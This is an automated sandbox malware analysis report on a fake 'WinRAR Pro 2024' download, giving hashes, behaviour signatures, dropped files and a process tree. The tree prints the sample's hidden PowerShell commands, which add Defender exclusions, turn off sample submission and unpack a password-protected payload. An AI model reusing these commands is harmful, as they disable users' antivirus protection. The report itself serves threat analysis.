eff920ad73b1bd4d2def6b79a52c4fe0f449902044c8efbbdf65afbdf93ef410

Analysis

max time kernel
119s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19/11/2024, 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinRAR Pro 2024 - Full Active.zip
Size

55.8MB
MD5

ea081bf71035f4c204696240c1f87469
SHA1

f55949c7871806fbd88b5ac5ea72f7aa742f00ef
SHA256

eff920ad73b1bd4d2def6b79a52c4fe0f449902044c8efbbdf65afbdf93ef410
SHA512

e400548244b8f7294832883d5fb9133e99db16039d63bbb6c931d33aa47bc4dad4cc974bbe05cf9d99c4ac10e62a237859ea4b9a86bf34c8805e9393d07df8c8
SSDEEP

1572864:cg7zo9RW2q1bND/7Hqb2sOgul5mRgD33QsENn:cyIRWf1bNr78cEiD33jg

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3620	powershell.exe
1316	powershell.exe
3620	powershell.exe
1316	powershell.exe
3796	powershell.exe
3820	powershell.exe
4816	powershell.exe

Patched UPX-packed file 1 IoCs

Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.

resource	yara_rule
behavioral2/files/0x0007000000023cea-521.dat	patched_upx

Executes dropped EXE 6 IoCs

pid	Process
4560	WinRAR Pro 2024 - Full Active.exe
2896	WinRAR Pro 2024 - Full Active.exe
2164	WinRAR Pro 2024 - Full Active.exe
2684	e7za.exe
2224	php.exe
3848	WinRAR Pro 2024 - Full Active.exe

Loads dropped DLL 25 IoCs

pid	Process
4560	WinRAR Pro 2024 - Full Active.exe
4560	WinRAR Pro 2024 - Full Active.exe
2896	WinRAR Pro 2024 - Full Active.exe
2896	WinRAR Pro 2024 - Full Active.exe
2164	WinRAR Pro 2024 - Full Active.exe
2164	WinRAR Pro 2024 - Full Active.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
2224	php.exe
3848	WinRAR Pro 2024 - Full Active.exe
3848	WinRAR Pro 2024 - Full Active.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e7za.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4089630652-1596403869-279772308-1000\{CFBA4A0B-3181-45CF-AE65-CE7BADCF2D63}	WinRAR Pro 2024 - Full Active.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4089630652-1596403869-279772308-1000\{49EE33E7-B945-4F73-8BFE-155FE79C73DB}	WinRAR Pro 2024 - Full Active.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1316	powershell.exe
1316	powershell.exe
3620	powershell.exe
3796	powershell.exe
3620	powershell.exe
3796	powershell.exe
3820	powershell.exe
3820	powershell.exe
4816	powershell.exe
4816	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3476	7zFM.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	3476	7zFM.exe
Token: 35	3476	7zFM.exe
Token: SeSecurityPrivilege	3476	7zFM.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3476	7zFM.exe
3476	7zFM.exe
3476	7zFM.exe
3476	7zFM.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 4560 wrote to memory of 2896	4560	WinRAR Pro 2024 - Full Active.exe	100
PID 4560 wrote to memory of 2896	4560	WinRAR Pro 2024 - Full Active.exe	100
PID 4560 wrote to memory of 1316	4560	WinRAR Pro 2024 - Full Active.exe	101
PID 4560 wrote to memory of 1316	4560	WinRAR Pro 2024 - Full Active.exe	101
PID 4560 wrote to memory of 2164	4560	WinRAR Pro 2024 - Full Active.exe	103
PID 4560 wrote to memory of 2164	4560	WinRAR Pro 2024 - Full Active.exe	103
PID 1316 wrote to memory of 3620	1316	powershell.exe	104
PID 1316 wrote to memory of 3620	1316	powershell.exe	104
PID 4560 wrote to memory of 3796	4560	WinRAR Pro 2024 - Full Active.exe	106
PID 4560 wrote to memory of 3796	4560	WinRAR Pro 2024 - Full Active.exe	106
PID 3796 wrote to memory of 2684	3796	powershell.exe	108
PID 3796 wrote to memory of 2684	3796	powershell.exe	108
PID 3796 wrote to memory of 2684	3796	powershell.exe	108
PID 4560 wrote to memory of 3820	4560	WinRAR Pro 2024 - Full Active.exe	109
PID 4560 wrote to memory of 3820	4560	WinRAR Pro 2024 - Full Active.exe	109
PID 3820 wrote to memory of 2224	3820	powershell.exe	111
PID 3820 wrote to memory of 2224	3820	powershell.exe	111
PID 2224 wrote to memory of 4432	2224	php.exe	112
PID 2224 wrote to memory of 4432	2224	php.exe	112
PID 4432 wrote to memory of 4816	4432	cmd.exe	113
PID 4432 wrote to memory of 4816	4432	cmd.exe	113
PID 4560 wrote to memory of 3848	4560	WinRAR Pro 2024 - Full Active.exe	114
PID 4560 wrote to memory of 3848	4560	WinRAR Pro 2024 - Full Active.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\WinRAR Pro 2024 - Full Active.zip"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3476

C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe
"C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4560
- C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe" --type=gpu-process --enable-features=FixAltGraph --no-sandbox --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=B46CAD1867190F84B6BF12BFB7013CEA --mojo-platform-channel-handle=1324 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath \"\"\"C:\Users\Admin\AppData\Local\"\"\";Set-MpPreference -MAPSReporting Disable;Set-MpPreference -SubmitSamplesConsent NeverSend;' -Verb RunAs"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath """C:\Users\Admin\AppData\Local""";Set-MpPreference -MAPSReporting Disable;Set-MpPreference -SubmitSamplesConsent NeverSend;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3620
- C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe" --type=gpu-process --enable-features=FixAltGraph --no-sandbox --gpu-preferences=KAAAAAAAAACAAwCAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --service-request-channel-token=F701FBBDE1391211883EB6EDA6047BC1 --mojo-platform-channel-handle=1312 /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  PID:2164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "& 'C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe' x plendix -p\"zkT5QjZ7w8I0A9m6yK2p\" -aoa"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe
    "C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe" x plendix -pzkT5QjZ7w8I0A9m6yK2p -aoa
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "& 'C:\Users\Admin\AppData\Local\Sredmiker\php.exe' include.php"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Users\Admin\AppData\Local\Sredmiker\php.exe
    "C:\Users\Admin\AppData\Local\Sredmiker\php.exe" include.php
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c "PowerShell -executionpolicy bypass -File time.ps1"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -executionpolicy bypass -File time.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
- C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe
  "C:\Users\Admin\Desktop\WinRAR Pro 2024 - Full Active.exe" --type=renderer --no-sandbox --enable-features=FixAltGraph --service-pipe-token=E3CAC55CB592B2D590EA9578DE819BB9 --lang --app-path="C:\Users\Admin\Desktop\resources\app.asar" --node-integration=false --webview-tag=false --no-sandbox --context-isolation --background-color=#fff --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-compositor-image-animations --service-request-channel-token=E3CAC55CB592B2D590EA9578DE819BB9 --renderer-client-id=5 --mojo-platform-channel-handle=1888 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\VCRUNTIME140.dll

Filesize
93KB

MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\e7za.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_bz2.dll

Filesize
86KB

MD5
734c9075926844a51bf5fe8aaecfb751

SHA1
6add19a0dbd8bc15f40183c80822e57af178c3ff

SHA256
59d7b6959001cd9109d4ccd0410adbc1a7d4cfb0d83cd04328c6e16197bf7370

SHA512
9260a428cffe1e1e2621398c944854dbc7c6628fd878ed135f213824b62340e2cefe5262f9b7039e0e23d1a9151d7cf8a3b39df899dbd9c3256104d95d5feffb

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_com_dotnet.dll

Filesize
87KB

MD5
fab4daf7d5b727bf4ebb3907c533bccc

SHA1
70cfe7bcd87fffde2223c409c89dbeb71b494b4a

SHA256
987ec3151942e211195ab36af22bc563ca528e0215714eb67f74189e2aacf34d

SHA512
b8438c03b8398802066c525572dd37ffc198e2f5efc6a2e83f06fdc2c71e7224760b780728ccf570b3f68c31cd9119a70174b7efda550b2403a1b8c61994d73e

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_curl.dll

Filesize
519KB

MD5
d1c6dbda0b43b617f6dec4df00d1a279

SHA1
70c11039449e3c6d52ec5d73297faf602079f80b

SHA256
b8a9deacf3d1f54b9184a37be8fc5fce545a029a8681687872fb2e78110c485c

SHA512
fc89f0773e0045f0accae86f5a5dd6d240a97b9df832316086f6ae64a053cc40f0da144ff4543efb4ce67818aa7134d7e9765cfe5a7544df9329c2d592c1d033

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_fileinfo.dll

Filesize
4.8MB

MD5
80fe7da4d37fdcd313eab184bca3af62

SHA1
e44733a0be9d40457bda7068f7f8d026a90b5195

SHA256
f50f7c7eb3fe3fc7abfa9bfc869f48a7c44e65a6b7203190cb9402f7d90fc27a

SHA512
2df31147a0e37ecb9f02bb6296aca2e6cfb661f01bfdb22aa5898756d07083d0f5e4f200e2c3074362e3118b2b4b5674daf72a05d01acb2749789cfaa8ae47e3

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_gd2.dll

Filesize
1.5MB

MD5
89028ff306c3ea6736e2f61c821c33f3

SHA1
adee094e6929d04bea70aaf3c2d6ef8d19b15ede

SHA256
5276f87ba956a4d1d7f80371763215dca69b38240e42486652ed5655a702d3d9

SHA512
298e97bad9b3ee50d104905f63ed7eda8e8bdb64490a4b1cecf946bb36ae08e6fd14978942b5e3f94d7fdfd8641bdb4b2c61a688ab91e23224a50b74b222139f

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_ioncube.dll

Filesize
880KB

MD5
74b5ec763ea8e4b87a503b6eeb6a27a2

SHA1
cf46f5692f4b3a3b937f1d7e50f177a26097ae7f

SHA256
7eae76a36fa5440b996b09520c252ab5014b5a9fbe9bcbe57231fbda75c7f7f3

SHA512
28557d6a644d577706d95f5be54760e2417c0899bd180a1c1e8169d935988aed9dbe53ed6a1202e2101f1d1912ba2d450e44ec15a6e3b8dc0f95509c52d174c4

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_mbstring.dll

Filesize
1.4MB

MD5
925641312da1980050060faf78481afe

SHA1
c563204f01a3b725643eaff426e2e2255454b529

SHA256
c7b5ad31a5430f836767436be3c58e0b630610745673b2a9e462182bddbce3b0

SHA512
cfc65adcf891abc1ce7c71150b8b0effda5fa1a11f601900229954518fb8cea855c9248ff93853a603998da11c4be4844c0df64a7977881bc9d736b914eac84e

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_openssl.dll

Filesize
119KB

MD5
8703f70d3666a887e3099875f3fac5d9

SHA1
c558fc6ed4f2bb7f869a18abb6433d85014ec44a

SHA256
b5d074368cfb82896719321637dac2b539df2367a373cc71e34b0573323dce1b

SHA512
b1e8672214fc6dd87e09f051b59b8650abd8ab780128c424f130e79fa5fa0c536d7b7318ed3c3039b49deaf1920709d0c693c0fb17bbe59444f657cfe7949361

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\ext\php_pdo_sqlite.dll

Filesize
856KB

MD5
fc034e6e3b86aaffb2b621de4985e2a4

SHA1
7522d5e35e3b4cc15b2ad15b56366e24156d91ce

SHA256
2a218f72e76a913ecf214ee224350f9a820730a3d514718a27d038cdc43d5672

SHA512
8513f965d59325542f862d2e5268ad9bae423fd7566b6239b37ca0572103e614d7e08fe1cf5dc3855b08d6f94b221cc3dab307fa212152150b86dd7231bec9a6

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libcrypto-1_1-x64.dll

Filesize
2.9MB

MD5
784eac5c1d5f17c9aabe6022fb4d190a

SHA1
717215ebd43fa26332cf6f6aa9d8e243b25c52ee

SHA256
1d02feb7210afe246eca7ebd052dbceb214d179ccb458186d4181bd4b5538af4

SHA512
556830f901f0c4d58d7da7b4774c8813454597805d2cc1f33a40cae8cd80da101e7958d65d5fb94b7b97f623befbcc59570050938e8fa5d836b1c9f2a1ac960c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libssh2.dll

Filesize
218KB

MD5
7aa3260787e11bc0309311ad9e67b5b0

SHA1
81e31c18ca8100581e6bf721d20c3c30ccef3dd9

SHA256
e413d17d40bfa46fb946dd31dfec17366481d287582f803f3399c1aa360ae748

SHA512
59ec506ab012e48eeca1f5a8f1cbe959024bbd454e4733b66f527ffd03f70a7242d3c722964e65cf800450dd7ca7cd1eae60bb026fd4e1b4b44c1dab6d95ca8c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\libssl-1_1-x64.dll

Filesize
505KB

MD5
6e58c06e745ceb9cd282e6f38fbe0527

SHA1
de8759ce2cab7e9875757963ca72ed33f71c58e1

SHA256
928d7f65f2e0594595b46aaf645e45b59c287074cdc8d80d707da65d46630c23

SHA512
ebdfff987c4c51ae27fa6183443867261ba0bb1248b81b671888143e81f6d64cf26cda44974f97a5ea66854ab4ae622c6684668a63ad8158267f40112baabc13

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\nghttp2.dll

Filesize
194KB

MD5
3050e106c606b480a80c950e1466d2d1

SHA1
66792a5f379deff2545f1dec7e6f94812ea47da4

SHA256
aa6ec793d436f312215afbcc090ae65cb444b79b80ecc6bdf826322ce6f534a5

SHA512
7621cbca7ec4babf4a8379e81104eda74a9429566c5922d5c9ca93f5acb3bf9aae6d861d9a16ce9bff0531d3ebc39ca8b06ddfd4941df37ab8efca3d28edfeaf

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php.exe

Filesize
123KB

MD5
8db8ff7802efe20753a50e3653703740

SHA1
05ceaf802e222f254c8e09bae6753b81f638d260

SHA256
d09c3c5bdeac44d08a4be559111a6790a34b0b636d3f4749949c43e6e21c544b

SHA512
f73af38eff7d60be7c227fe2cc9ce8f846451b1d8764c550286e9dfac305e0c45b683d7a504a302d5f22f91cbed75ac969943919c850b19f3d0d852bc1cb5d5d

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php.ini

Filesize
70KB

MD5
5fa10fbd9cdcdefa94e497a4b2d2b813

SHA1
2b278a10e9967b9076a027e69f910bf215f2a035

SHA256
e9796c19589b948b7fdd5f300e055c0bbbafbfbabbb36b109d13e185fec0e4ed

SHA512
c6664f68bff8009a0b75d2c1b440d00141ffe903a6fc6c0782bfa9a96cf74d0dbc5e6b52727afb0953e2a74c558001fb56b8fd4386fd562c027bd4aa913f510c

Download Submit
C:\Users\Admin\AppData\Local\Sredmiker\php7.dll

Filesize
8.5MB

MD5
4e3849e0765c159ad32c6eaaf67106c9

SHA1
d0927fbcd56bb84be43531542c4bc3e1cb2b3d63

SHA256
0808805eb42a75341c3ea2b31d330eb23df5dd222c8ec0ae1df4037d536165f4

SHA512
5ddb90cf732e00859635ba292e1c8560aa2f4d438f5dc5cf0d468a537848390ed28417ee295c1b2e894ca7141b0dc526702238fdf71a4ccca8e3f1d934d9e4f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\8931b474-5f42-4e30-b2cf-3dd216234b5d.tmp

Filesize
9.8MB

MD5
f890cab9cf204e2af5b422ed0d19c9b5

SHA1
fc1bb3df77d13af3fde9d1b2c5f29c6397611a31

SHA256
5820c778afb230843fc3d5c867b20da9beebe9debcc02ddb4690f8d80924a9ce

SHA512
1dba2f45c8308ac69e85d57ba01c2e6ea67f1d758ee1ca010a795f518a9932a79ebb03cf8ba6af59d33ceeb92d399dc39831c0bd6df1ff9d0a273866a5ca5014

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hx5dbp4.vti.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
62a68219659266ce465e0cae970c2efb

SHA1
7315097c50faee8778e51398b09b5d148975b058

SHA256
38df51ddabba5c76c62e108ccb6e222e24c8ba31ef47ee66b1f5bd1739e8e33a

SHA512
9b77d83c5332309c8f8b5480c266bcd99bb929c6c70abee1c94fbbd8b7479f69c450a4b90f21c518f80c043fd68387f58190cdac0afbf166550a90b7066f7218

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
6c125e4935e65be766fe667ab3a64786

SHA1
71b0375fd286a1e917eb946aa49275d9a3910c31

SHA256
48607044ba9b1eb135814de1afd1fc795dbeae523798e185a59dcebbc6daf048

SHA512
a87b7c116ae50a90d9617c803fadc7f258cb1fa868858c2c5cc1925dc59821c1bf97c8cebdca5b17d9ba813c3bc9a8e6aac925f7badeee0a8c722340aa21875b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c327317b1d8d55bc97c9310a63ecf9a9

SHA1
4580dc9a6efd69cd265557728cea7df80240c918

SHA256
1853e6910e673a7b4c569675900fadc838a2b41e625200363c2b052bb2b5b69e

SHA512
a04f2120355c4fdb8e99c5c75d7e3c84cd6fc037fe31fd8d1713dc97c6d1bc81a9635da8d5319842475e20005390ee2efd2069a49120cbbf800962b84964e52b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
bfd4be5c8ba5c9d0f36929f5bcaa0407

SHA1
393c556ccaf8366ecb9824a0f05e61206e43e35f

SHA256
a0d1c1b47c4656eead6c1d377ce1f593ca5cc12acefed0e7c60842ff0ba187ac

SHA512
dab7570fc46f18effd2ce33667267b8a3ba21a0d43ae7edbd17b59e31cfe528aab36364597ce2d00aa53cf9996af638355f07196320a5715de266cea7685bad6

Download Submit
C:\Users\Admin\Desktop\content_shell.pak

Filesize
7.1MB

MD5
ab9992f3bef24d6ffd8e76ce56f96de5

SHA1
531cc9767c3d3b4a342516e97326b859b3b3ea5a

SHA256
8818e8af6a3475e6bb6ebbd9d69bbac67fc156eca73840125987c1e9f9f2c92a

SHA512
3570882596b5ffef77da8758287a997504664a07926bd639cf01b2ad35e8fbd0ab00de669cf87269a241e073a2038f9f369e8f76d04282c7fe894956b57eb888

Download Submit
C:\Users\Admin\Desktop\ffmpeg.dll

Filesize
1.7MB

MD5
327c1b74aa4d859b859b1de85036d969

SHA1
2b3ea047c3b5348a9916ccde4fd3f82355597c5e

SHA256
da46d37d872f945bae607d9008fa3731aa7e71df72b91c9feb6940475cd26c7c

SHA512
5e6bc8a8a5b361c5cadcd6230166b659aabb497a5a14c7c5c7723829f128b320205486f5da402f633e2458e83204b3bcb0f8d3edab937fe55f6939870ae394ac

Download Submit
C:\Users\Admin\Desktop\icudtl.dat

Filesize
9.7MB

MD5
62ce282dfe0ab8f2a35a529faeb61ac2

SHA1
c35d6e4db540518263214697f589c54faac87533

SHA256
c3b6588446b4a48e36dc135f9920ad246f5c84fe59c634b4225b009dd1dace13

SHA512
a773bf66fcb9a12c1d8f3a760724c8438c7f240617b8099e4e2af979b84676892dbcaa866ca2fad59d2e56493ec3f96f0874e4e6e7fe7ca25e22ea2606e9a853

Download Submit
C:\Users\Admin\Desktop\natives_blob.bin

Filesize
170KB

MD5
7f20917d39abdc8ccac48f8cce93bf09

SHA1
93c804ac74ce32c17538f04d175f775550946826

SHA256
a23d9b8422322157c7900b2cc35bf9a8129c08e4b9807dae26f412981b9c1b78

SHA512
183c4d606af1bc57a5d958d4ff34d9633a23493d18317544e8dd4b05dff010fce249d4ceee646b8f14c9367f509890292df1cd85957a0d2a0ea9f82045559f34

Download Submit
C:\Users\Admin\Desktop\node.dll

Filesize
17.7MB

MD5
eff754c2e27e951a51b2e480b0a82489

SHA1
a22fce626b90ce6870abf61a4fd14c82c9982bb6

SHA256
342b0cf35b6625929542c88cfce7419e1578603693c40866b3e09c46329833f0

SHA512
bef23f7346ab695ddec647ad5520e1bc311d831ba5dcd9bd223276d7f69fc483ab5f707cbf9b46bc3191e660bb3de34e7ac4686deb71e9bf86456584ba970e46

Download Submit
C:\Users\Admin\Desktop\resources\app.asar

Filesize
10.5MB

MD5
089412648f9eabd87ba7b83adf284b0a

SHA1
65a663421ee4f95d317008dd20c89c90cabda2b2

SHA256
c2a6d3a841a68c9d75b92321d60465bc66545b47fb9d0b303ef7811d68f108f9

SHA512
f4f35d282ccc83476ba954af398d11d79a5a6f1043813d8ad96be3135d7df474eb09f281d67662060a4355af469dc41a832d1802e967aefc7c9022e502cbe64e

Download Submit
C:\Users\Admin\Desktop\resources\electron.asar

Filesize
256KB

MD5
b7bad86a92506aa7af9e66ca86ff2fab

SHA1
c0fcd1b819295558f537bde162b5c3013141f8f4

SHA256
e5a427c138a24f41ed422bd8c8ec2aa0cb84d7da25bfc745466efecb807b92e3

SHA512
d8a63edc7c18d48662cda9549fe4888ccfe221a6d22096e0c30696a4c77f029a70d4bd88006cb3f01edc3b58d10d0730bb23ea3a6a4feb57f10ab8e7a113d556

Download Submit
C:\Users\Admin\Desktop\v8_context_snapshot.bin

Filesize
1.7MB

MD5
9f155b6775dd15d10091de0ae97ae246

SHA1
0b26abdd21d6b624e27f1c43badc558e78361cd6

SHA256
1a47ef6cc2b67e22a39f9d879bd2a4e22bc8a33bc560c93f6d7b167b2b8ce5d8

SHA512
